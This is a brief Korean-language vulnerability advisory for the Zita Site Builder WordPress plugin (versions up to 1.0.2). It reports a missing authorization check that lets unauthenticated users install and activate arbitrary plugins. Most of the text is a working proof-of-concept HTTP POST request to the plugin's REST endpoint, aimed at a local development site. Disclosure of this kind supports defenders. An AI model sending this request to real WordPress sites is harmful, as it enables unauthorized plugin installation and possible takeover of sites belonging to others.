
Zita Site Builder <= 1.0.2 - 임의의 플러그인 설치에 대한 권한 부여 누락
Zita Site Builder <= 1.0.2 - 임의 플러그인 설치를 위한 권한 확인 누락
WordPress용 Zita Site Builder 플러그인은 1.0.2 버전까지의 일부 함수에서 기능에 대한 무단 접근이 가능한 취약점이 있습니다. 이로 인해 인증되지 않은 공격자가 임의의 플러그인을 설치하고 활성화할 수 있습니다.
POST /wp-json/ai/v1/ai-site-builder HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://wp-dev.ddev.site/wp-admin/admin.php?page=ai-site-builder&template=step
Content-Type: application/json
Content-Length: 245
Origin: https://wp-dev.ddev.site
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
{"params":{"templateType":"free","plugin":{"woocommerce":"Woocommerce"},"allPlugins":[{"woocommerce":"woocommerce/woocommerce.php"}],"builder":"th-shop-mania","themeSlug":"th-shop-mania","proThemePlugin":"hunk-companion","tmplFreePro":"plugin"}}
"\"https:\\\/\\\/wp-dev.ddev.site\""